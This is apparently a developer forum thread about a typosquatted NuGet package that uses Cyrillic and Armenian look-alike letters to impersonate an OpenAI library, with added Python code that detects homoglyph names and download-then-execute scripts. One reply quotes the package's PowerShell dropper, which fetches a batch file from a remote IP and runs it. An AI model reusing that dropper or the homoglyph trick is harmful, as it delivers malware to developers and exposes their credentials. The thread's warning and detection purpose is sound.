I’m using Visual Studio 2022 Enterprise, and I tried to install the following NuGet package:
[REMOVED BECAUSE MALICIOUS]
But I’m getting the following error:
Error MSB5016 The name “PkgOpеոAI” contains an invalid character “е”. The project file is invalid on disk and was not reloaded.
Using a Unicode character inspector such as this, it looks like instead of regular Latin characters, the “e” and “n” are actually the following:
CYRILLIC SMALL LETTER IE
ARMENIAN SMALL LETTER VO
Sooo lol what? Is that actually an official package or some kind of fake?
Edit: Ok, the package now looks super sus. I think it’s a fake; there are other packages by that same account, also with weird characters in them, and all created 5 days ago.
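A reproducible version of that character inspection, added here as an example and not code from the thread or from any package it mentions. The name PkgOpеոAI is taken from the MSBuild error above; the look-alike table, the helper names and the "trusted name" comparison are assumptions for illustration:

```python
import unicodedata

# Constructed sample: the package-name fragment from the MSBuild error above, with the
# Cyrillic "е" (U+0435) and Armenian "ո" (U+0578) standing in for Latin "e" and "n".
SUSPICIOUS_NAME = "PkgOp\u0435\u0578AI"
EXPECTED_NAME = "PkgOpenAI"

# Hand-picked Latin look-alikes, assumed for this example. A real check should load
# the Unicode confusables.txt data instead of this short table.
LOOKALIKES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",   # Cyrillic a, ie, o, er
    "\u0441": "c", "\u0445": "x", "\u0443": "y",                  # Cyrillic es, ha, u
    "\u0578": "n",                                                # Armenian vo
}


def script_of(ch):
    """First word of the Unicode character name, e.g. 'LATIN', 'CYRILLIC', 'ARMENIAN'."""
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]


def non_ascii_chars(name):
    """Describe every non-ASCII character: the output a character inspector would give."""
    return [
        {
            "char": ch,
            "codepoint": f"U+{ord(ch):04X}",
            "name": unicodedata.name(ch, "UNKNOWN"),
            "script": script_of(ch),
        }
        for ch in name
        if ord(ch) > 0x7F
    ]


def is_mixed_script(name):
    """True when letters from more than one script are mixed (Latin + Cyrillic, ...)."""
    return len({script_of(ch) for ch in name if ch.isalpha()}) > 1


def skeleton(name):
    """Map known look-alikes back to ASCII so the name can be compared to a trusted one."""
    return "".join(LOOKALIKES.get(ch, ch) for ch in name)


def check_package_name(name, trusted):
    """Return the signals a pre-install check would log for a package name."""
    return {
        "non_ascii": non_ascii_chars(name),
        "mixed_script": is_mixed_script(name),
        # NFKC does not fold Cyrillic or Armenian letters into Latin, so normalising
        # alone does not catch this; that is why the skeleton comparison is needed.
        "changed_by_nfkc": unicodedata.normalize("NFKC", name) != name,
        "impersonates_trusted": name != trusted and skeleton(name) == trusted,
    }


if __name__ == "__main__":
    for label, name in (("suspicious", SUSPICIOUS_NAME), ("expected", EXPECTED_NAME)):
        print(label, check_package_name(name, EXPECTED_NAME))
```

The mixed-script and non-ASCII signals are cheap to add to any install or build gate; the skeleton comparison against the name you meant to install is what turns "weird characters" into "this is impersonating PkgOpenAI".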
Looking at the file, I hope you rev up your antivirus:

```powershell
# Downloader stage shipped in the package (the IP is redacted in the thread):
# fetch a batch file from the attacker's host into the Windows temp directory ...
$URL = "http://45.###.66.##/download/Anthrax.bat"
$FilePath = "C:\Windows\Temp\Anthrax.bat"
Invoke-WebRequest -Uri $URL -OutFile $FilePath
# ... and then execute it through cmd.exe
cmd.exe /c $FilePath
```
There was actually a fun article regarding this exact attack vector. Here’s the article: “Did ChatGPT write this repository?”
ChatGPT can offer coding solutions, but its tendency for hallucination presents attackers with an opportunity. Here’s what we learned.
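A small scanner for the download-then-execute pattern in that snippet, added here as an example and not code from the thread or from the package. The regexes, the one-line variable tracking and the benign comparison script are my own assumptions; the dropper text is the four lines quoted above with the IP left redacted:

```python
import re

# Constructed sample: the four dropper lines quoted in the thread, IP kept redacted.
DROPPER = r'''$URL = "http://45.###.66.##/download/Anthrax.bat"
$FilePath = "C:\Windows\Temp\Anthrax.bat"
Invoke-WebRequest -Uri $URL -OutFile $FilePath
cmd.exe /c $FilePath
'''

# Constructed benign sample: downloads a file but only hashes it, never runs it.
BENIGN = r'''$URL = "https://example.invalid/tool.zip"
$FilePath = "C:\Windows\Temp\tool.zip"
Invoke-WebRequest -Uri $URL -OutFile $FilePath
Get-FileHash $FilePath
'''

# $Name = "literal" on a single line (enough for the shape seen in the dropper).
ASSIGN = re.compile(r'^\s*(\$\w+)\s*=\s*"?([^"]*?)"?\s*$')
DOWNLOAD = re.compile(r"\bInvoke-WebRequest\b|\biwr\b", re.IGNORECASE)
URI_ARG = re.compile(r"-Uri\s+(\S+)", re.IGNORECASE)
OUTFILE_ARG = re.compile(r"-OutFile\s+(\S+)", re.IGNORECASE)
# Ways a PowerShell script hands a file to an interpreter; "&" is the call operator.
EXECUTE = re.compile(
    r"(?:\bcmd(?:\.exe)?\s+/c|\bStart-Process\b|\bInvoke-Expression\b|\biex\b|&)\s+(\S+)",
    re.IGNORECASE,
)


def find_download_and_execute(script):
    """Flag lines that run a file that an earlier line downloaded with -OutFile."""
    variables = {}   # $Name -> literal assigned on a single line
    downloaded = {}  # token used as -OutFile -> (line number, resolved URL)
    hits = []

    def resolve(token):
        return variables.get(token, token).strip('"')

    for lineno, line in enumerate(script.splitlines(), 1):
        m = ASSIGN.match(line)
        if m:
            variables[m.group(1)] = m.group(2)
            continue
        if DOWNLOAD.search(line):
            out = OUTFILE_ARG.search(line)
            uri = URI_ARG.search(line)
            if out:
                downloaded[out.group(1)] = (lineno, resolve(uri.group(1)) if uri else None)
            continue
        m = EXECUTE.search(line)
        if m and m.group(1) in downloaded:
            dl_line, url = downloaded[m.group(1)]
            hits.append({
                "download_line": dl_line,
                "exec_line": lineno,
                "url": url,
                "path": resolve(m.group(1)),
            })
    return hits


if __name__ == "__main__":
    print("dropper:", find_download_and_execute(DROPPER))
    print("benign: ", find_download_and_execute(BENIGN))
```

The point of tracking the variable rather than grepping for Invoke-WebRequest alone is the benign case: plenty of legitimate scripts download files, and the signal is that the same path is then executed. Obfuscated droppers (string concatenation, encoded commands) will slip past a line-by-line regex, so treat a hit as a reason to stop and read the script, not a complete detector.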
Yeah, fake characters are usually a telltale sign of phishing. There have been a lot of questions like “how did my API key get compromised”, and I think this is just one of the possibilities. OpenAI API keys are quite valuable now, as people can use them to generate fake reviews or whatever.
I’m personally skeptical enough that I do that part myself. It’s not hard to just do a POST call and handle the errors, and it looks like even the official OpenAI ones lag behind some of the latest changes.
Holy moly, does NuGet even validate their packages?
There are no official packages for .NET.
Community libraries are available for C# / .NET, as of now.
Let us know if you used one of them.
@ThioJoe’s channel was this → . ← close to turning into Elon Musk.
Jokes apart, good thing it was noticed!
Apparently not. Lesson learned
Wow, this is crazy, idk how much malicious stuff could be uploaded.
What about PyPI?
Wow, I’ve used a lot of random PyPI packages in my time, I hope I don’t get a virus.
@ThioJoe what can I do to prevent that?
Haha, same here. I think you can prevent that by not using root to install stuff, that’s first, and by only installing known and trusted packages.